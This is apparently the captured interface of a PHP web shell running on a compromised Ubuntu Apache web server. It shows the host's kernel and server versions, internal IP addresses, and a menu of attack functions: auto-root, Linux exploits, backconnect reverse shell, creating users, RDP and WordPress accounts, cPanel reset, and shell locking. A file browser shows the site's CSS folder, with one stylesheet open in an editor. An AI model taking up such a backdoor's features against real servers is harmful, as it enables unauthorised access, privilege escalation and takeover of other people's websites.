Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
assets /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
font
[ DIR ]
drwxr-x--x
lightgallery
[ DIR ]
drwxr-x--x
scss
[ DIR ]
drwxr-x--x
home.css
39.43
KB
-rwxrwxrwx
home.scss
393
B
-rwxr-x--x
inner.css
24.26
KB
-rwxr-x--x
inner.scss
1.3
KB
-rwxr-x--x
last-final-mainv2.css
483.58
KB
-rwxr-x--x
main.css
898.29
KB
-rwxr-x--x
main.scss
1.08
MB
-rwxr-x--x
mainv2.css
483.07
KB
-rwxr-x--x
mainv2.scss
599.79
KB
-rwxr-x--x
swiper-bundle.min.css
17.54
KB
-rwxr-x--x
theme-custom.css
625
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : inner.scss
@import 'scss/mixins'; @import 'scss/card'; @import 'scss/benifit'; @import 'scss/event'; @import 'scss/media-cover'; //@import 'scss/jobs'; @import 'scss/publication'; .landing-subnav--wrapper,.header-subnav--wrapper,.global-innergapfromnav { padding-top: 120px; } .landing-subnav--intro .title { color: var(--secondary-color); } .consultant { position: relative; overflow: hidden; display: flex; flex-direction: column; justify-content: center; align-items: center; cursor: pointer; .consultant-social { color: var(--link-color); font-size: 18px; margin: 8px auto; display: flex; align-items: center; column-gap: 12px; } .consultant-desc { text-align: center; position: absolute; top: 0; background: rgb(242, 242, 242); left: 0; right: 0; bottom: 0; display: flex; align-items: center; justify-content: center; opacity: 0; transform: translateY(-100%); transition: all 0.2s ease-in; padding: 16px; flex-direction: column; } &:hover { .consultant-desc { opacity: 1; transform: translateY(0); } } }
Close